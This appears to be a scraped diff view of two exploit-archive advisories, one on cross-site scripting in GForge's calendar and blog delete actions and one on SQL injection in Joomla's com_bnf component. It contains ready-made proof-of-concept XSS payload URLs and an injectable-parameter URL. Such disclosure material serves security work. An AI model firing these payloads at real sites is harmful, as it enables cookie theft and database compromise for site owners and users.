||||
GForge is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
|
||||
|
||||
http://www.example.com/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
|
||||
|
||||
http://www.example.com/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
|
||||
|
||||
|
7
platforms/php/webapps/36657.txt
Executable file
7
platforms/php/webapps/36657.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51802/info
|
||||
|
||||
The 'com_bnf' component for Joomla! is prone to a remote SQL injection vulnerability.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL Injection]&direccion=&direct=0&Itemid=0&lang=es
|
Loading…
Add table
Reference in a new issue